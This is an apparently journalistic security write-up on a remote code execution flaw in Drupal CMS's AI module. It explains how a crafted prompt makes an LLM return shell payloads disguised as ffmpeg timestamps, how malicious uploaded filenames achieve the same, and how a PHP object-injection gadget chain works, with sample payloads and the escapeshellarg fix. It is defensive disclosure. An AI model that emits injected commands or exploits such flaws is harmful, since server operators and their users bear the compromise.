Exploiting the AI Module in Drupal CMS: A Tale of Command Injection and PHP Object Injection

In March 2025, the Drupal Security Team released a critical update to address a Remote Code Execution vulnerability in the Artificial Intelligence (AI) contributed module, which is included in Drupal CMS. As a curious journalist, I decided to dig deeper into this vulnerability and explore its implications.

The problem lies in insufficient validation of unsafe input, specifically in the AI Automators submodule. The vulnerability can be exploited through two interesting vectors. First, by manipulating the timestamps generated by the Large Language Model (LLM) used for video analysis, an attacker can inject malicious commands into the shell. Second, by uploading a file whose filename contains a shell payload to a file field, an attacker can likewise execute arbitrary commands on the server.

The Vulnerable Code: A Recipe for Command Injection

The vulnerable code is in the AI Automators submodule, which uses ffmpeg to process video files. The module builds shell commands that include both the path of the uploaded input file and timestamps provided by the LLM. Neither value is validated or escaped before being interpolated into the command, so an attacker who controls either one can inject arbitrary shell commands.
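The module's real code is more involved, but the dangerous pattern looks roughly like the sketch below. The variable names and the getFileUri()/$llmResponse plumbing are illustrative placeholders, not the module's actual API; the point is the unescaped interpolation into exec():

    <?php
    // Illustrative sketch of the vulnerable pattern, not the module's exact code.
    $inputFile = $file->getFileUri();      // attacker-influenced: the uploaded filename
    $startTime = $llmResponse['start'];    // attacker-influenced: "timestamps" from the LLM
    $endTime   = $llmResponse['end'];

    // Nothing is validated or escaped before it reaches the shell.
    $command = "ffmpeg -y -nostdin -i \"$inputFile\" -ss $startTime -to $endTime -c copy output.mp4";
    exec($command, $output, $status);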

One of the most interesting aspects of this vulnerability is that it can be exploited through the LLM itself, for example a ChatGPT instance. By crafting a specific prompt, an attacker can trick the LLM into returning "timestamps" that actually carry a shell payload. The module then interpolates those values into the ffmpeg command without any sanitization, and the injected command executes.
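As a hypothetical illustration (this payload is my own, not one from the advisory), an LLM response such as the following would be enough when substituted for the start timestamp in the sketch above:

    00:00:10$(touch /tmp/pwned)

The shell performs the $( ) command substitution before ffmpeg ever sees the argument, so the injected command runs and the remaining 00:00:10 is still passed along as a plausible timestamp.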

Exploiting the Vulnerability with a Malicious Filename

Another way to achieve Command Injection is by uploading a file with a malicious filename to a file field. Since Drupal does not sanitize filenames by default, an attacker can send a crafted HTTP request with a tool such as Burp Suite so that the stored filename carries a Command Injection payload straight into the shell command.
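For example (again a hypothetical payload rather than one taken from the advisory), a multipart upload can declare a filename like the one below. It keeps a valid .mp4 extension but smuggles a command substitution into the path that later ends up inside the ffmpeg invocation:

    video$(touch HACKED).mp4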

In my tests with a vanilla install of Drupal CMS, I was able to achieve Command Injection without even interacting with the LLM. This highlights the importance of input validation and sanitization, especially for data coming from untrusted sources like LLMs.

The "Gadget Chain" Vulnerability: A Recipe for Remote Code Execution

In addition to the initial vulnerability, there is a closely related issue that can be exploited to achieve Arbitrary File Deletion and possibly even Remote Code Execution. It relies on what is known as a "gadget chain", or POP (Property-Oriented Programming) chain.

The underlying problem is a PHP Object Injection vulnerability in which an attacker controls the value of the $tmpDir property of an unserialized object. By exploiting it, an attacker can delete files on the server without having to set up a workflow with the vulnerable automation. Furthermore, if the attacker can also upload a file with a Command Injection payload embedded in its filename, they can combine the two and escalate the gadget chain to full Remote Code Execution.
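The advisory does not publish the class involved, but the general shape of a destructor-based file-deletion gadget is easy to sketch. The class name, property handling, and serialized payload below are placeholders I have invented for illustration; the point is that unserializing attacker-controlled data creates an object whose destructor later acts on an attacker-chosen path:

    <?php
    // Hypothetical sketch of a destructor-based gadget; all names are placeholders.
    class TempWorkspace {
      public string $tmpDir;

      public function __destruct() {
        // Runs automatically when the object goes out of scope, even if it was
        // created by unserialize() on attacker-controlled input.
        foreach (glob($this->tmpDir . '/*') ?: [] as $file) {
          unlink($file);
        }
        rmdir($this->tmpDir);
      }
    }

    // A payload such as this would delete files from a directory of the
    // attacker's choosing as soon as the injected object is destructed:
    // O:13:"TempWorkspace":1:{s:6:"tmpDir";s:19:"/var/www/html/sites";}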

The Fixes: Sanitizing Input and Preventing PHP Object Injection

The fixes for these vulnerabilities use PHP's escapeshellarg() (and related functions) to ensure that unsafe input is sanitized before being passed to the underlying shell. This blocks Command Injection and reinforces the broader point that input coming from untrusted sources, including LLMs, must be validated before use.
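Applied to the earlier sketch, the fix amounts to escaping every externally influenced value before it reaches the shell (again, illustrative code rather than the module's actual patch):

    <?php
    // Illustrative fix: each externally influenced value is escaped individually.
    $command = sprintf(
      'ffmpeg -y -nostdin -i %s -ss %s -to %s -c copy %s',
      escapeshellarg($inputFile),
      escapeshellarg($startTime),
      escapeshellarg($endTime),
      escapeshellarg('output.mp4')
    );
    exec($command, $output, $status);

On top of escaping, validating the values themselves, for example rejecting any "timestamp" that does not match a strict HH:MM:SS pattern, further narrows the attack surface.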

I would like to thank Marcus in particular for his help investigating and remediating these issues. His response to being contacted by the Drupal Security Team was exemplary. It's essential to emphasize that data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets.

The Takeaway: Input Validation is Key

The vulnerabilities in the AI module highlight the importance of input validation and sanitization, especially when dealing with untrusted data sources like LLMs. By taking these precautions, we can prevent Command Injection attacks and PHP Object Injection exploits, ensuring that our web applications are secure and reliable.

In conclusion, this vulnerability serves as a reminder to always prioritize input validation and sanitization, even in seemingly innocuous parts of our codebase.